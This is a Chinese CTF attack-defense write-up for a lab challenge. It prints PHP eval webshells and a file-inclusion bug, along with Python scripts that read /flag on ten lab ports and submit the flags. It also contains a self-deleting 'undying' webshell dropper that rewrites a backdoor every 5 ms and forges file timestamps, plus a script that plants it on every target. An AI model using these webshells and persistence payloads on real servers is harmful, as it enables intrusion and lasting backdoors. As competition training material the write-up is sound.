【AWD】 yunnan_simple WriteUp

本文最后更新于:2021年8月18日下午1点45分

题目环境:

靶机IP:192.168.2.146

SSH端口:2201-2210

Web端口:8801-8810

flag提交地址:192.168.2.146:8080

flag提交api:192.168.2.146:8080/flag_file.php?token=队伍token&flag=获取到的flag

D盾漏洞

image-20210613134409815

漏洞1——.a.php

漏洞详情:

<?php @eval($_REQUEST['c']); // one-line webshell: whatever arrives in the `c` parameter (by default GET, POST or cookie via $_REQUEST) is executed as PHP; `@` silences error output
?>

image-20210613133210570

可以看到是一句话木马。

漏洞利用:

list目录:192.168.2.146:8801/.a.php?c=system(ls);

cat flag:192.168.2.146:8801/.a.php?c=system(“cat /flag”);

image-20210613134305226

批量获取flag + 提交flag 脚本:

# 192.168.2.146:8801/.a.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/.a.php'

# range(1, 11) -> ports 8801-8810, one request per port.
for i in range(1 , 11):
# The command is carried in the `c` query parameter that .a.php hands to eval().
payload = { "c" : 'system("cat /flag");'}
url = url1 + str(8800 + i) + url2
try:
res = requests.get(url, params = payload)
# NOTE(review): bare except catches BaseException — connection errors, timeouts and even Ctrl-C all just skip the port silently.
except:
continue
else:
# The entire response body is treated as the flag; nothing is extracted or validated before submission.
print(res.text)
flag_payload = { "token" : "team1" , "flag" : res.text}
submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php" , params = flag_payload)

image-20210613135321940

image-20210613135712763

漏洞2——a.php

漏洞详情:

<?php @eval($_REQUEST['c']); // same one-line webshell as .a.php: the `c` request parameter is executed as PHP, `@` silences error output
var_dump($_SERVER); // additionally dumps the server/request environment into every response, which is why the flag has to be cut out of the output below
?>

image-20210613135818591

漏洞利用:

和上一个差不多,但是比上一个.a.php多了var_dump(),因此在获得flag的时候,需要做正则匹配(也可以截取字符串= =)

image-20210613135939096

批量获取flag并提交脚本:

# 192.168.2.146:8801/a.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/a.php'

# range(1, 11) -> ports 8801-8810, one request per port.
for i in range(1 , 11):
# The command is carried in the `c` query parameter that a.php hands to eval().
payload = { "c" : 'system("cat /flag");'}
url = url1 + str(8800 + i) + url2
try:
res = requests.get(url, params = payload)
# NOTE(review): bare except catches BaseException — connection errors, timeouts and even Ctrl-C all just skip the port silently.
except:
continue
else:
# a.php appends var_dump($_SERVER) to the output, so only the first 32 characters are kept — presumably the flag length; not verified here.
flag = res.text[0:32]
print(flag)
flag_payload = {"token": "team1", "flag": flag}
submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)

漏洞3——about.php

漏洞详情:

<?php
$file=$_GET['file']; // taken straight from the query string with no validation or allow-list
include $file; // file inclusion: any readable path (the page uses /flag) is included and returned; PHP code inside the included file would execute
?>

image-20210613140511069

很显然是一个文件包含漏洞:

image-20210613140559510

image-20210613140619309

脚本如下:

# http://192.168.2.146:8801/about.php?file=/flag

import requests

url1 = "http://192.168.2.146:"
url2 = '/about.php'

# range(1, 11) -> ports 8801-8810, one request per port.
for i in range(1 , 11):
# about.php includes whatever path arrives in `file`, so the response body is the file's contents.
payload = { "file" : '/flag'}
url = url1 + str(8800 + i) + url2
try:
res = requests.get(url, params = payload)
# NOTE(review): bare except catches BaseException — connection errors, timeouts and even Ctrl-C all just skip the port silently.
except:
continue
else:
# Only the first 32 characters are kept — presumably the flag length; not verified here.
flag = res.text[0:32]
print(flag)
flag_payload = {"token": "team1", "flag": flag}
submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)

漏洞4——config.php

image-20210613141036170

还是一句话木马

脚本如下:

# http://192.168.2.146:8801/config.php?c=system("cat /flag");

import requests

url1 = "http://192.168.2.146:"
url2 = '/config.php'

# range(1, 11) -> ports 8801-8810, one request per port.
for i in range(1 , 11):
# Same `c`-parameter webshell as the earlier files, this time in config.php.
payload = { "c" : 'system("cat /flag");'}
url = url1 + str(8800 + i) + url2
try:
res = requests.get(url, params = payload)
# NOTE(review): bare except catches BaseException — connection errors, timeouts and even Ctrl-C all just skip the port silently.
except:
continue
else:
# Only the first 32 characters are kept — presumably the flag length; not verified here.
flag = res.text[0:32]
print(flag)
flag_payload = {"token": "team1", "flag": flag}
submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)

利用一句话木马批量上传不死马

  • PHP版本不死马:

    <?php 
    // Keep running after the client disconnects, with no execution time limit.
    ignore_user_abort(true);
    set_time_limit(0);
    // Remove this dropper from disk; the already-running process continues with the loop below.
    unlink(__FILE__);
    $file = '2.php';
    // Source of the re-created shell: gated on md5 of GET "pass", then evals POST "coin".
    $code = '<?php if(md5($_GET["pass"])=="1ac3544114c9c5e2853a183138093e5e"){@eval($_POST[coin]);} ?>';
    while (1){
    // Rewrite 2.php every 5 ms (usleep is in microseconds), so deleting the file alone does not remove it.
    file_put_contents($file,$code);
    // NOTE(review): sets a fixed past mtime on ".2.php" (leading dot — a different name from $file); file timestamps on such a host cannot be trusted during triage.
    system('touch -m -d "2018-12-01 09:10:12" .2.php');
    usleep(5000);
    }
    ?>
  • 在hackbar中上传不死马(假设一句话木马的密码为c)

    其中stripslashes()为反转义函数

    c=file_put_contents("bsm.php",stripslashes("<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\$file = \'2.php\';\$code = \'<?php if(md5(\$_GET[\"pass\"])==\"1ac3544114c9c5e2853a183138093e5e\"){@eval(\$_POST[\"coin\"]);} ?>\';while (1){ file_put_contents(\$file,\$code); system(\'touch -m -d \"2018-12-01 09:10:12\" .2.php\'); usleep(5000);} ?>"));
  • 由于批量上传不死马,需要用到Python,因此对上方的PHP不死马需要进行二次转义

    file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));
  • 最终的python脚本

    import time
    import requests

    url1 = "http://192.168.2.146:"

    url2 = "/.a.php" # .a.php here holds the one-line webshell @eval($_REQUEST['c']);

    # range(1, 11) -> ports 8801-8810; the whole sequence below runs once per port.
    for i in range(1,11):
    print("*****************************")
    url = url1 + str(8800 + i) + url2
    # Doubly-escaped PHP (see the list item above): once unescaped it is the self-rewriting shell source, written to bsm.php by file_put_contents.
    hack = "file_put_contents(\"bsm.php\",stripslashes(\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = \\\'2.php\\\';\\$code = \\\'<?php if(md5(\\$_GET[\\\"pass\\\"])==\\\"1ac3544114c9c5e2853a183138093e5e\\\"){@eval(\\$_POST[\\\"coin\\\"]);} ?>\\\';while (1){ file_put_contents(\\$file,\\$code); system(\\\'touch -m -d \\\"2018-12-01 09:10:12\\\" .2.php\\\'); usleep(5000);} ?>\"));"
    data = {
    "c" : hack
    }
    try:
    # Sent as a POST body this time; .a.php reads $_REQUEST, so GET and POST both reach eval().
    upload_res = requests.post(url , data=data)

    # NOTE(review): bare except; upload_res is never inspected, so the "成功" message below is printed for any reply that did not raise, not only for a successful write.
    except:
    continue
    else:
    print("端口号为" + str(8800 + i) + "的机器不死马上传成功" )
    requests_url = url1 + str(8800 + i) + "/bsm.php" # request bsm.php to start it
    try:
    requests_res = requests.get(requests_url , timeout = 5)
    # bsm.php loops forever, so this request presumably never completes and the 5 s timeout lands here; indentation was lost in extraction, so whether the steps below belong to this except branch or to the loop body cannot be told from this listing.
    except:
    time.sleep(6) # pause 6 s so the running dropper has written 2.php
    print("-------开始访问不死马获取flag:")
    get_flag_url = url1 + str(8800+i) + "/2.php?pass=7coin@1202"
    get_flag_data = {
    "coin" : "system(\"cat /flag\");"
    }
    get_flag_res = requests.post(get_flag_url , data=get_flag_data)
    # First 32 characters of the reply are taken as the flag — presumably the flag length; not verified here.
    print("端口号为"+str(8800+i)+"的机器flag为:"+get_flag_res.text[0:32])
    flag_payload = {"token": "team1", "flag": get_flag_res.text[0:32]}
    submit_flag = requests.get("http://192.168.2.146:8080/flag_file.php", params=flag_payload)
    # NOTE(review): submit_flag is never checked, so "提交成功" is printed regardless of what the submission endpoint answered.
    print("flag提交成功!!!!!!!!!")

其余漏洞:

image-20210615182228278